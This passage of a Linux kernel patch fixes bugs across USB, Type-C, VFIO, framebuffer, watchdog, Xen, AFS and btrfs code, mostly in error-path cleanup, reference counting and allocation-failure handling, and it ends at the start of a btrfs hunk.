+diff --git a/drivers/usb/host/xhci-mtk.c b/drivers/usb/host/xhci-mtk.c
+index 01705e559c422..c61fc19ef1154 100644
+--- a/drivers/usb/host/xhci-mtk.c
++++ b/drivers/usb/host/xhci-mtk.c
+@@ -639,7 +639,6 @@ static int xhci_mtk_probe(struct platform_device *pdev)
+ 
+ dealloc_usb3_hcd:
+ 	usb_remove_hcd(xhci->shared_hcd);
+-	xhci->shared_hcd = NULL;
+ 
+ dealloc_usb2_hcd:
+ 	usb_remove_hcd(hcd);
+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index ad81e9a508b14..343709af4c16f 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -2458,7 +2458,7 @@ static int process_bulk_intr_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 
+ 	switch (trb_comp_code) {
+ 	case COMP_SUCCESS:
+-		ep_ring->err_count = 0;
++		ep->err_count = 0;
+ 		/* handle success with untransferred data as short packet */
+ 		if (ep_trb != td->last_trb || remaining) {
+ 			xhci_warn(xhci, "WARN Successful completion on short TX\n");
+@@ -2484,7 +2484,7 @@ static int process_bulk_intr_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 		break;
+ 	case COMP_USB_TRANSACTION_ERROR:
+ 		if (xhci->quirks & XHCI_NO_SOFT_RETRY ||
+-		    (ep_ring->err_count++ > MAX_SOFT_RETRY) ||
++		    (ep->err_count++ > MAX_SOFT_RETRY) ||
+ 		    le32_to_cpu(slot_ctx->tt_info) & TT_SLOT)
+ 			break;
+ 
+@@ -2565,8 +2565,14 @@ static int handle_tx_event(struct xhci_hcd *xhci,
+ 		case COMP_USB_TRANSACTION_ERROR:
+ 		case COMP_INVALID_STREAM_TYPE_ERROR:
+ 		case COMP_INVALID_STREAM_ID_ERROR:
+-			xhci_handle_halted_endpoint(xhci, ep, 0, NULL,
+-						    EP_SOFT_RESET);
++			xhci_dbg(xhci, "Stream transaction error ep %u no id\n",
++				 ep_index);
++			if (ep->err_count++ > MAX_SOFT_RETRY)
++				xhci_handle_halted_endpoint(xhci, ep, 0, NULL,
++							    EP_HARD_RESET);
++			else
++				xhci_handle_halted_endpoint(xhci, ep, 0, NULL,
++							    EP_SOFT_RESET);
+ 			goto cleanup;
+ 		case COMP_RING_UNDERRUN:
+ 		case COMP_RING_OVERRUN:
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index cc084d9505cdf..c9f06c5e4e9d2 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -933,6 +933,7 @@ struct xhci_virt_ep {
+ 	 * have to restore the device state to the previous state
+ 	 */
+ 	struct xhci_ring		*new_ring;
++	unsigned int			err_count;
+ 	unsigned int			ep_state;
+ #define SET_DEQ_PENDING		(1 << 0)
+ #define EP_HALTED		(1 << 1)	/* For stall handling */
+@@ -1627,7 +1628,6 @@ struct xhci_ring {
+ 	 * if we own the TRB (if we are the consumer).  See section 4.9.1.
+ 	 */
+ 	u32			cycle_state;
+-	unsigned int            err_count;
+ 	unsigned int		stream_id;
+ 	unsigned int		num_segs;
+ 	unsigned int		num_trbs_free;
+diff --git a/drivers/usb/musb/musb_gadget.c b/drivers/usb/musb/musb_gadget.c
+index 6704a62a16659..ba20272d22215 100644
+--- a/drivers/usb/musb/musb_gadget.c
++++ b/drivers/usb/musb/musb_gadget.c
+@@ -1628,8 +1628,6 @@ static int musb_gadget_vbus_draw(struct usb_gadget *gadget, unsigned mA)
+ {
+ 	struct musb	*musb = gadget_to_musb(gadget);
+ 
+-	if (!musb->xceiv->set_power)
+-		return -EOPNOTSUPP;
+ 	return usb_phy_set_power(musb->xceiv, mA);
+ }
+ 
+diff --git a/drivers/usb/musb/omap2430.c b/drivers/usb/musb/omap2430.c
+index f571a65ae6ee2..476f55d1fec30 100644
+--- a/drivers/usb/musb/omap2430.c
++++ b/drivers/usb/musb/omap2430.c
+@@ -15,6 +15,7 @@
+ #include <linux/list.h>
+ #include <linux/io.h>
+ #include <linux/of.h>
++#include <linux/of_irq.h>
+ #include <linux/platform_device.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/pm_runtime.h>
+@@ -310,6 +311,7 @@ static int omap2430_probe(struct platform_device *pdev)
+ 	struct device_node		*control_node;
+ 	struct platform_device		*control_pdev;
+ 	int				ret = -ENOMEM, val;
++	bool				populate_irqs = false;
+ 
+ 	if (!np)
+ 		return -ENODEV;
+@@ -328,6 +330,18 @@ static int omap2430_probe(struct platform_device *pdev)
+ 	musb->dev.dma_mask		= &omap2430_dmamask;
+ 	musb->dev.coherent_dma_mask	= omap2430_dmamask;
+ 
++	/*
++	 * Legacy SoCs using omap_device get confused if node is moved
++	 * because of interconnect properties mixed into the node.
++	 */
++	if (of_get_property(np, "ti,hwmods", NULL)) {
++		dev_warn(&pdev->dev, "please update to probe with ti-sysc\n");
++		populate_irqs = true;
++	} else {
++		device_set_of_node_from_dev(&musb->dev, &pdev->dev);
++	}
++	of_node_put(np);
++
+ 	glue->dev			= &pdev->dev;
+ 	glue->musb			= musb;
+ 	glue->status			= MUSB_UNKNOWN;
+@@ -389,6 +403,46 @@ static int omap2430_probe(struct platform_device *pdev)
+ 		goto err2;
+ 	}
+ 
++	if (populate_irqs) {
++		struct resource musb_res[3];
++		struct resource *res;
++		int i = 0;
++
++		memset(musb_res, 0, sizeof(*musb_res) * ARRAY_SIZE(musb_res));
++
++		res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
++		if (!res)
++			goto err2;
++
++		musb_res[i].start = res->start;
++		musb_res[i].end = res->end;
++		musb_res[i].flags = res->flags;
++		musb_res[i].name = res->name;
++		i++;
++
++		ret = of_irq_get_byname(np, "mc");
++		if (ret > 0) {
++			musb_res[i].start = ret;
++			musb_res[i].flags = IORESOURCE_IRQ;
++			musb_res[i].name = "mc";
++			i++;
++		}
++
++		ret = of_irq_get_byname(np, "dma");
++		if (ret > 0) {
++			musb_res[i].start = ret;
++			musb_res[i].flags = IORESOURCE_IRQ;
++			musb_res[i].name = "dma";
++			i++;
++		}
++
++		ret = platform_device_add_resources(musb, musb_res, i);
++		if (ret) {
++			dev_err(&pdev->dev, "failed to add IRQ resources\n");
++			goto err2;
++		}
++	}
++
+ 	ret = platform_device_add_data(musb, pdata, sizeof(*pdata));
+ 	if (ret) {
+ 		dev_err(&pdev->dev, "failed to add platform_data\n");
+diff --git a/drivers/usb/roles/class.c b/drivers/usb/roles/class.c
+index dfaed7eee94fc..32e6d19f7011a 100644
+--- a/drivers/usb/roles/class.c
++++ b/drivers/usb/roles/class.c
+@@ -106,10 +106,13 @@ usb_role_switch_is_parent(struct fwnode_handle *fwnode)
+ 	struct fwnode_handle *parent = fwnode_get_parent(fwnode);
+ 	struct device *dev;
+ 
+-	if (!parent || !fwnode_property_present(parent, "usb-role-switch"))
++	if (!fwnode_property_present(parent, "usb-role-switch")) {
++		fwnode_handle_put(parent);
+ 		return NULL;
++	}
+ 
+ 	dev = class_find_device_by_fwnode(role_class, parent);
++	fwnode_handle_put(parent);
+ 	return dev ? to_role_switch(dev) : ERR_PTR(-EPROBE_DEFER);
+ }
+ 
+diff --git a/drivers/usb/storage/alauda.c b/drivers/usb/storage/alauda.c
+index 747be69e5e699..5e912dd29b4c9 100644
+--- a/drivers/usb/storage/alauda.c
++++ b/drivers/usb/storage/alauda.c
+@@ -438,6 +438,8 @@ static int alauda_init_media(struct us_data *us)
+ 		+ MEDIA_INFO(us).blockshift + MEDIA_INFO(us).pageshift);
+ 	MEDIA_INFO(us).pba_to_lba = kcalloc(num_zones, sizeof(u16*), GFP_NOIO);
+ 	MEDIA_INFO(us).lba_to_pba = kcalloc(num_zones, sizeof(u16*), GFP_NOIO);
++	if (MEDIA_INFO(us).pba_to_lba == NULL || MEDIA_INFO(us).lba_to_pba == NULL)
++		return USB_STOR_TRANSPORT_ERROR;
+ 
+ 	if (alauda_reset_media(us) != USB_STOR_XFER_GOOD)
+ 		return USB_STOR_TRANSPORT_ERROR;
+diff --git a/drivers/usb/typec/bus.c b/drivers/usb/typec/bus.c
+index 26ea2fdec17dc..31c2a3130cadb 100644
+--- a/drivers/usb/typec/bus.c
++++ b/drivers/usb/typec/bus.c
+@@ -134,7 +134,7 @@ int typec_altmode_exit(struct typec_altmode *adev)
+ 	if (!adev || !adev->active)
+ 		return 0;
+ 
+-	if (!pdev->ops || !pdev->ops->enter)
++	if (!pdev->ops || !pdev->ops->exit)
+ 		return -EOPNOTSUPP;
+ 
+ 	/* Moving to USB Safe State */
+diff --git a/drivers/usb/typec/tcpm/tcpci.c b/drivers/usb/typec/tcpm/tcpci.c
+index b2bfcebe218f0..72f8d1e876004 100644
+--- a/drivers/usb/typec/tcpm/tcpci.c
++++ b/drivers/usb/typec/tcpm/tcpci.c
+@@ -794,8 +794,10 @@ struct tcpci *tcpci_register_port(struct device *dev, struct tcpci_data *data)
+ 		return ERR_PTR(err);
+ 
+ 	tcpci->port = tcpm_register_port(tcpci->dev, &tcpci->tcpc);
+-	if (IS_ERR(tcpci->port))
++	if (IS_ERR(tcpci->port)) {
++		fwnode_handle_put(tcpci->tcpc.fwnode);
+ 		return ERR_CAST(tcpci->port);
++	}
+ 
+ 	return tcpci;
+ }
+@@ -804,6 +806,7 @@ EXPORT_SYMBOL_GPL(tcpci_register_port);
+ void tcpci_unregister_port(struct tcpci *tcpci)
+ {
+ 	tcpm_unregister_port(tcpci->port);
++	fwnode_handle_put(tcpci->tcpc.fwnode);
+ }
+ EXPORT_SYMBOL_GPL(tcpci_unregister_port);
+ 
+diff --git a/drivers/usb/typec/tipd/core.c b/drivers/usb/typec/tipd/core.c
+index 2a77bab948f54..195c9c16f817f 100644
+--- a/drivers/usb/typec/tipd/core.c
++++ b/drivers/usb/typec/tipd/core.c
+@@ -814,20 +814,19 @@ static int tps6598x_probe(struct i2c_client *client)
+ 
+ 	ret = devm_tps6598_psy_register(tps);
+ 	if (ret)
+-		return ret;
++		goto err_role_put;
+ 
+ 	tps->port = typec_register_port(&client->dev, &typec_cap);
+ 	if (IS_ERR(tps->port)) {
+ 		ret = PTR_ERR(tps->port);
+ 		goto err_role_put;
+ 	}
+-	fwnode_handle_put(fwnode);
+ 
+ 	if (status & TPS_STATUS_PLUG_PRESENT) {
+ 		ret = tps6598x_read16(tps, TPS_REG_POWER_STATUS, &tps->pwr_status);
+ 		if (ret < 0) {
+ 			dev_err(tps->dev, "failed to read power status: %d\n", ret);
+-			goto err_role_put;
++			goto err_unregister_port;
+ 		}
+ 		ret = tps6598x_connect(tps, status);
+ 		if (ret)
+@@ -840,14 +839,16 @@ static int tps6598x_probe(struct i2c_client *client)
+ 					dev_name(&client->dev), tps);
+ 	if (ret) {
+ 		tps6598x_disconnect(tps, 0);
+-		typec_unregister_port(tps->port);
+-		goto err_role_put;
++		goto err_unregister_port;
+ 	}
+ 
+ 	i2c_set_clientdata(client, tps);
++	fwnode_handle_put(fwnode);
+ 
+ 	return 0;
+ 
++err_unregister_port:
++	typec_unregister_port(tps->port);
+ err_role_put:
+ 	usb_role_switch_put(tps->role_sw);
+ err_fwnode_put:
+diff --git a/drivers/usb/typec/wusb3801.c b/drivers/usb/typec/wusb3801.c
+index 3cc7a15ecbd31..a43a18d4b02ed 100644
+--- a/drivers/usb/typec/wusb3801.c
++++ b/drivers/usb/typec/wusb3801.c
+@@ -364,7 +364,7 @@ static int wusb3801_probe(struct i2c_client *client)
+ 	/* Initialize the hardware with the devicetree settings. */
+ 	ret = wusb3801_hw_init(wusb3801);
+ 	if (ret)
+-		return ret;
++		goto err_put_connector;
+ 
+ 	wusb3801->cap.revision		= USB_TYPEC_REV_1_2;
+ 	wusb3801->cap.accessory[0]	= TYPEC_ACCESSORY_AUDIO;
+diff --git a/drivers/vfio/iova_bitmap.c b/drivers/vfio/iova_bitmap.c
+index 6631e8befe1b2..0f19d502f351b 100644
+--- a/drivers/vfio/iova_bitmap.c
++++ b/drivers/vfio/iova_bitmap.c
+@@ -295,11 +295,13 @@ void iova_bitmap_free(struct iova_bitmap *bitmap)
+  */
+ static unsigned long iova_bitmap_mapped_remaining(struct iova_bitmap *bitmap)
+ {
+-	unsigned long remaining;
++	unsigned long remaining, bytes;
++
++	bytes = (bitmap->mapped.npages << PAGE_SHIFT) - bitmap->mapped.pgoff;
+ 
+ 	remaining = bitmap->mapped_total_index - bitmap->mapped_base_index;
+ 	remaining = min_t(unsigned long, remaining,
+-	      (bitmap->mapped.npages << PAGE_SHIFT) / sizeof(*bitmap->bitmap));
++			  bytes / sizeof(*bitmap->bitmap));
+ 
+ 	return remaining;
+ }
+@@ -394,29 +396,27 @@ int iova_bitmap_for_each(struct iova_bitmap *bitmap, void *opaque,
+  * Set the bits corresponding to the range [iova .. iova+length-1] in
+  * the user bitmap.
+  *
+- * Return: The number of bits set.
+  */
+ void iova_bitmap_set(struct iova_bitmap *bitmap,
+ 		     unsigned long iova, size_t length)
+ {
+ 	struct iova_bitmap_map *mapped = &bitmap->mapped;
+-	unsigned long offset = (iova - mapped->iova) >> mapped->pgshift;
+-	unsigned long nbits = max_t(unsigned long, 1, length >> mapped->pgshift);
+-	unsigned long page_idx = offset / BITS_PER_PAGE;
+-	unsigned long page_offset = mapped->pgoff;
+-	void *kaddr;
+-
+-	offset = offset % BITS_PER_PAGE;
++	unsigned long cur_bit = ((iova - mapped->iova) >>
++			mapped->pgshift) + mapped->pgoff * BITS_PER_BYTE;
++	unsigned long last_bit = (((iova + length - 1) - mapped->iova) >>
++			mapped->pgshift) + mapped->pgoff * BITS_PER_BYTE;
+ 
+ 	do {
+-		unsigned long size = min(BITS_PER_PAGE - offset, nbits);
++		unsigned int page_idx = cur_bit / BITS_PER_PAGE;
++		unsigned int offset = cur_bit % BITS_PER_PAGE;
++		unsigned int nbits = min(BITS_PER_PAGE - offset,
++					 last_bit - cur_bit + 1);
++		void *kaddr;
+ 
+ 		kaddr = kmap_local_page(mapped->pages[page_idx]);
+-		bitmap_set(kaddr + page_offset, offset, size);
++		bitmap_set(kaddr, offset, nbits);
+ 		kunmap_local(kaddr);
+-		page_offset = offset = 0;
+-		nbits -= size;
+-		page_idx++;
+-	} while (nbits > 0);
++		cur_bit += nbits;
++	} while (cur_bit <= last_bit);
+ }
+ EXPORT_SYMBOL_GPL(iova_bitmap_set);
+diff --git a/drivers/vfio/platform/vfio_platform_common.c b/drivers/vfio/platform/vfio_platform_common.c
+index 55dc4f43c31e3..1a0a238ffa354 100644
+--- a/drivers/vfio/platform/vfio_platform_common.c
++++ b/drivers/vfio/platform/vfio_platform_common.c
+@@ -72,12 +72,11 @@ static int vfio_platform_acpi_call_reset(struct vfio_platform_device *vdev,
+ 				  const char **extra_dbg)
+ {
+ #ifdef CONFIG_ACPI
+-	struct acpi_buffer buffer = { ACPI_ALLOCATE_BUFFER, NULL };
+ 	struct device *dev = vdev->device;
+ 	acpi_handle handle = ACPI_HANDLE(dev);
+ 	acpi_status acpi_ret;
+ 
+-	acpi_ret = acpi_evaluate_object(handle, "_RST", NULL, &buffer);
++	acpi_ret = acpi_evaluate_object(handle, "_RST", NULL, NULL);
+ 	if (ACPI_FAILURE(acpi_ret)) {
+ 		if (extra_dbg)
+ 			*extra_dbg = acpi_format_exception(acpi_ret);
+diff --git a/drivers/video/fbdev/Kconfig b/drivers/video/fbdev/Kconfig
+index cfc55273dc5d1..974e862cd20d6 100644
+--- a/drivers/video/fbdev/Kconfig
++++ b/drivers/video/fbdev/Kconfig
+@@ -601,6 +601,7 @@ config FB_TGA
+ config FB_UVESA
+ 	tristate "Userspace VESA VGA graphics support"
+ 	depends on FB && CONNECTOR
++	depends on !UML
+ 	select FB_CFB_FILLRECT
+ 	select FB_CFB_COPYAREA
+ 	select FB_CFB_IMAGEBLIT
+@@ -2217,7 +2218,6 @@ config FB_SSD1307
+ 	select FB_SYS_COPYAREA
+ 	select FB_SYS_IMAGEBLIT
+ 	select FB_DEFERRED_IO
+-	select PWM
+ 	select FB_BACKLIGHT
+ 	help
+ 	  This driver implements support for the Solomon SSD1307
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index c0143d38df83a..14a7d404062c3 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -2450,7 +2450,8 @@ err_out:
+ 
+ 	if (userfont) {
+ 		p->userfont = old_userfont;
+-		REFCOUNT(data)--;
++		if (--REFCOUNT(data) == 0)
++			kfree(data - FONT_EXTRA_WORDS * sizeof(int));
+ 	}
+ 
+ 	vc->vc_font.width = old_width;
+diff --git a/drivers/video/fbdev/ep93xx-fb.c b/drivers/video/fbdev/ep93xx-fb.c
+index 2398b3d48fedf..305f1587bd898 100644
+--- a/drivers/video/fbdev/ep93xx-fb.c
++++ b/drivers/video/fbdev/ep93xx-fb.c
+@@ -552,12 +552,14 @@ static int ep93xxfb_probe(struct platform_device *pdev)
+ 
+ 	err = register_framebuffer(info);
+ 	if (err)
+-		goto failed_check;
++		goto failed_framebuffer;
+ 
+ 	dev_info(info->dev, "registered. Mode = %dx%d-%d\n",
+ 		 info->var.xres, info->var.yres, info->var.bits_per_pixel);
+ 	return 0;
+ 
++failed_framebuffer:
++	clk_disable_unprepare(fbi->clk);
+ failed_check:
+ 	if (fbi->mach_info->teardown)
+ 		fbi->mach_info->teardown(pdev);
+diff --git a/drivers/video/fbdev/geode/Kconfig b/drivers/video/fbdev/geode/Kconfig
+index ac9c860592aaf..85bc14b6faf64 100644
+--- a/drivers/video/fbdev/geode/Kconfig
++++ b/drivers/video/fbdev/geode/Kconfig
+@@ -5,6 +5,7 @@
+ config FB_GEODE
+ 	bool "AMD Geode family framebuffer support"
+ 	depends on FB && PCI && (X86_32 || (X86 && COMPILE_TEST))
++	depends on !UML
+ 	help
+ 	  Say 'Y' here to allow you to select framebuffer drivers for
+ 	  the AMD Geode family of processors.
+diff --git a/drivers/video/fbdev/hyperv_fb.c b/drivers/video/fbdev/hyperv_fb.c
+index 072ce07ba9e05..4ff25dfc865d9 100644
+--- a/drivers/video/fbdev/hyperv_fb.c
++++ b/drivers/video/fbdev/hyperv_fb.c
+@@ -780,12 +780,18 @@ static void hvfb_ondemand_refresh_throttle(struct hvfb_par *par,
+ static int hvfb_on_panic(struct notifier_block *nb,
+ 			 unsigned long e, void *p)
+ {
++	struct hv_device *hdev;
+ 	struct hvfb_par *par;
+ 	struct fb_info *info;
+ 
+ 	par = container_of(nb, struct hvfb_par, hvfb_panic_nb);
+-	par->synchronous_fb = true;
+ 	info = par->info;
++	hdev = device_to_hv_device(info->device);
++
++	if (hv_ringbuffer_spinlock_busy(hdev->channel))
++		return NOTIFY_DONE;
++
++	par->synchronous_fb = true;
+ 	if (par->need_docopy)
+ 		hvfb_docopy(par, 0, dio_fb_size);
+ 	synthvid_update(info, 0, 0, INT_MAX, INT_MAX);
+diff --git a/drivers/video/fbdev/pm2fb.c b/drivers/video/fbdev/pm2fb.c
+index 7da715d31a933..7a8609c40ae93 100644
+--- a/drivers/video/fbdev/pm2fb.c
++++ b/drivers/video/fbdev/pm2fb.c
+@@ -1533,8 +1533,10 @@ static int pm2fb_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	}
+ 
+ 	info = framebuffer_alloc(sizeof(struct pm2fb_par), &pdev->dev);
+-	if (!info)
+-		return -ENOMEM;
++	if (!info) {
++		err = -ENOMEM;
++		goto err_exit_disable;
++	}
+ 	default_par = info->par;
+ 
+ 	switch (pdev->device) {
+@@ -1715,6 +1717,8 @@ static int pm2fb_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	release_mem_region(pm2fb_fix.mmio_start, pm2fb_fix.mmio_len);
+  err_exit_neither:
+ 	framebuffer_release(info);
++ err_exit_disable:
++	pci_disable_device(pdev);
+ 	return retval;
+ }
+ 
+@@ -1739,6 +1743,7 @@ static void pm2fb_remove(struct pci_dev *pdev)
+ 	fb_dealloc_cmap(&info->cmap);
+ 	kfree(info->pixmap.addr);
+ 	framebuffer_release(info);
++	pci_disable_device(pdev);
+ }
+ 
+ static const struct pci_device_id pm2fb_id_table[] = {
+diff --git a/drivers/video/fbdev/uvesafb.c b/drivers/video/fbdev/uvesafb.c
+index 00d789b6c0faf..0e3cabbec4b40 100644
+--- a/drivers/video/fbdev/uvesafb.c
++++ b/drivers/video/fbdev/uvesafb.c
+@@ -1758,6 +1758,7 @@ static int uvesafb_probe(struct platform_device *dev)
+ out_unmap:
+ 	iounmap(info->screen_base);
+ out_mem:
++	arch_phys_wc_del(par->mtrr_handle);
+ 	release_mem_region(info->fix.smem_start, info->fix.smem_len);
+ out_reg:
+ 	release_region(0x3c0, 32);
+diff --git a/drivers/video/fbdev/vermilion/vermilion.c b/drivers/video/fbdev/vermilion/vermilion.c
+index 82b36dbb5b1a9..33051e3a2561e 100644
+--- a/drivers/video/fbdev/vermilion/vermilion.c
++++ b/drivers/video/fbdev/vermilion/vermilion.c
+@@ -278,8 +278,10 @@ static int vmlfb_get_gpu(struct vml_par *par)
+ 
+ 	mutex_unlock(&vml_mutex);
+ 
+-	if (pci_enable_device(par->gpu) < 0)
++	if (pci_enable_device(par->gpu) < 0) {
++		pci_dev_put(par->gpu);
+ 		return -ENODEV;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/video/fbdev/via/via-core.c b/drivers/video/fbdev/via/via-core.c
+index 2ee8fcae08dfb..b8cd04defc5e2 100644
+--- a/drivers/video/fbdev/via/via-core.c
++++ b/drivers/video/fbdev/via/via-core.c
+@@ -730,7 +730,14 @@ static int __init via_core_init(void)
+ 		return ret;
+ 	viafb_i2c_init();
+ 	viafb_gpio_init();
+-	return pci_register_driver(&via_driver);
++	ret = pci_register_driver(&via_driver);
++	if (ret) {
++		viafb_gpio_exit();
++		viafb_i2c_exit();
++		return ret;
++	}
++
++	return 0;
+ }
+ 
+ static void __exit via_core_exit(void)
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 1ea6d2e5b2187..99d6062afe72f 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -800,3 +800,4 @@ MODULE_AUTHOR("Brijesh Singh <brijesh.singh@amd.com>");
+ MODULE_LICENSE("GPL");
+ MODULE_VERSION("1.0.0");
+ MODULE_DESCRIPTION("AMD SEV Guest Driver");
++MODULE_ALIAS("platform:sev-guest");
+diff --git a/drivers/watchdog/iTCO_wdt.c b/drivers/watchdog/iTCO_wdt.c
+index 34693f11385f6..e937b4dd28be7 100644
+--- a/drivers/watchdog/iTCO_wdt.c
++++ b/drivers/watchdog/iTCO_wdt.c
+@@ -423,14 +423,18 @@ static unsigned int iTCO_wdt_get_timeleft(struct watchdog_device *wd_dev)
+ 	return time_left;
+ }
+ 
+-static void iTCO_wdt_set_running(struct iTCO_wdt_private *p)
++/* Returns true if the watchdog was running */
++static bool iTCO_wdt_set_running(struct iTCO_wdt_private *p)
+ {
+ 	u16 val;
+ 
+-	/* Bit 11: TCO Timer Halt -> 0 = The TCO timer is * enabled */
++	/* Bit 11: TCO Timer Halt -> 0 = The TCO timer is enabled */
+ 	val = inw(TCO1_CNT(p));
+-	if (!(val & BIT(11)))
++	if (!(val & BIT(11))) {
+ 		set_bit(WDOG_HW_RUNNING, &p->wddev.status);
++		return true;
++	}
++	return false;
+ }
+ 
+ /*
+@@ -518,9 +522,6 @@ static int iTCO_wdt_probe(struct platform_device *pdev)
+ 		return -ENODEV;	/* Cannot reset NO_REBOOT bit */
+ 	}
+ 
+-	/* Set the NO_REBOOT bit to prevent later reboots, just for sure */
+-	p->update_no_reboot_bit(p->no_reboot_priv, true);
+-
+ 	if (turn_SMI_watchdog_clear_off >= p->iTCO_version) {
+ 		/*
+ 		 * Bit 13: TCO_EN -> 0
+@@ -572,7 +573,13 @@ static int iTCO_wdt_probe(struct platform_device *pdev)
+ 	watchdog_set_drvdata(&p->wddev, p);
+ 	platform_set_drvdata(pdev, p);
+ 
+-	iTCO_wdt_set_running(p);
++	if (!iTCO_wdt_set_running(p)) {
++		/*
++		 * If the watchdog was not running set NO_REBOOT now to
++		 * prevent later reboots.
++		 */
++		p->update_no_reboot_bit(p->no_reboot_priv, true);
++	}
+ 
+ 	/* Check that the heartbeat value is within it's range;
+ 	   if not reset to the default */
+diff --git a/drivers/xen/privcmd.c b/drivers/xen/privcmd.c
+index fae50a24630bd..1edf45ee9890d 100644
+--- a/drivers/xen/privcmd.c
++++ b/drivers/xen/privcmd.c
+@@ -760,7 +760,7 @@ static long privcmd_ioctl_mmap_resource(struct file *file,
+ 		goto out;
+ 	}
+ 
+-	pfns = kcalloc(kdata.num, sizeof(*pfns), GFP_KERNEL);
++	pfns = kcalloc(kdata.num, sizeof(*pfns), GFP_KERNEL | __GFP_NOWARN);
+ 	if (!pfns) {
+ 		rc = -ENOMEM;
+ 		goto out;
+diff --git a/fs/afs/fs_probe.c b/fs/afs/fs_probe.c
+index 3ac5fcf98d0d6..daaf3810cc925 100644
+--- a/fs/afs/fs_probe.c
++++ b/fs/afs/fs_probe.c
+@@ -366,12 +366,15 @@ void afs_fs_probe_dispatcher(struct work_struct *work)
+ 	unsigned long nowj, timer_at, poll_at;
+ 	bool first_pass = true, set_timer = false;
+ 
+-	if (!net->live)
++	if (!net->live) {
++		afs_dec_servers_outstanding(net);
+ 		return;
++	}
+ 
+ 	_enter("");
+ 
+ 	if (list_empty(&net->fs_probe_fast) && list_empty(&net->fs_probe_slow)) {
++		afs_dec_servers_outstanding(net);
+ 		_leave(" [none]");
+ 		return;
+ 	}
+diff --git a/fs/binfmt_misc.c b/fs/binfmt_misc.c
+index e1eae7ea823ae..bb202ad369d53 100644
+--- a/fs/binfmt_misc.c
++++ b/fs/binfmt_misc.c
+@@ -44,10 +44,10 @@ static LIST_HEAD(entries);
+ static int enabled = 1;
+ 
+ enum {Enabled, Magic};
+-#define MISC_FMT_PRESERVE_ARGV0 (1 << 31)
+-#define MISC_FMT_OPEN_BINARY (1 << 30)
+-#define MISC_FMT_CREDENTIALS (1 << 29)
+-#define MISC_FMT_OPEN_FILE (1 << 28)
++#define MISC_FMT_PRESERVE_ARGV0 (1UL << 31)
++#define MISC_FMT_OPEN_BINARY (1UL << 30)
++#define MISC_FMT_CREDENTIALS (1UL << 29)
++#define MISC_FMT_OPEN_FILE (1UL << 28)
+ 
+ typedef struct {
+ 	struct list_head list;
+diff --git a/fs/btrfs/extent-io-tree.c b/fs/btrfs/extent-io-tree.c
+index 83cb0378096f2..3676580c2d97e 100644
+--- a/fs/btrfs/extent-io-tree.c
++++ b/fs/btrfs/extent-io-tree.c
+@@ -572,7 +572,7 @@ int __clear_extent_bit(struct extent_io_tree *tree, u64 start, u64 end,
+ 	if (bits & (EXTENT_LOCKED | EXTENT_BOUNDARY))
+ 		clear = 1;
+ again:
+-	if (!prealloc && gfpflags_allow_blocking(mask)) {
++	if (!prealloc) {
+ 		/*
+ 		 * Don't care for allocation failure here because we might end
+ 		 * up not needing the pre-allocated extent state at all, which
+@@ -636,7 +636,8 @@ hit_next:
+ 
+ 	if (state->start < start) {
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 		err = split_state(tree, state, prealloc, start);
+ 		if (err)
+ 			extent_io_tree_panic(tree, err);
+@@ -657,7 +658,8 @@ hit_next:
+ 	 */
+ 	if (state->start <= end && state->end > end) {
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 		err = split_state(tree, state, prealloc, end + 1);
+ 		if (err)
+ 			extent_io_tree_panic(tree, err);
+@@ -966,7 +968,7 @@ static int __set_extent_bit(struct extent_io_tree *tree, u64 start, u64 end,
+ 	else
+ 		ASSERT(failed_start == NULL);
+ again:
+-	if (!prealloc && gfpflags_allow_blocking(mask)) {
++	if (!prealloc) {
+ 		/*
+ 		 * Don't care for allocation failure here because we might end
+ 		 * up not needing the pre-allocated extent state at all, which
+@@ -991,7 +993,8 @@ again:
+ 	state = tree_search_for_insert(tree, start, &p, &parent);
+ 	if (!state) {
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 		prealloc->start = start;
+ 		prealloc->end = end;
+ 		insert_state_fast(tree, prealloc, p, parent, bits, changeset);
+@@ -1062,7 +1065,8 @@ hit_next:
+ 		}
+ 
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 		err = split_state(tree, state, prealloc, start);
+ 		if (err)
+ 			extent_io_tree_panic(tree, err);
+@@ -1099,7 +1103,8 @@ hit_next:
+ 			this_end = last_start - 1;
+ 
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 
+ 		/*
+ 		 * Avoid to free 'prealloc' if it can be merged with the later
+@@ -1130,7 +1135,8 @@ hit_next:
+ 		}
+ 
+ 		prealloc = alloc_extent_state_atomic(prealloc);
+-		BUG_ON(!prealloc);
++		if (!prealloc)
++			goto search_again;
+ 		err = split_state(tree, state, prealloc, end + 1);
+ 		if (err)
+ 			extent_io_tree_panic(tree, err);
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index d01631d478067..ed4e1c3705d0a 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -696,7 +696,10 @@ next_slot:
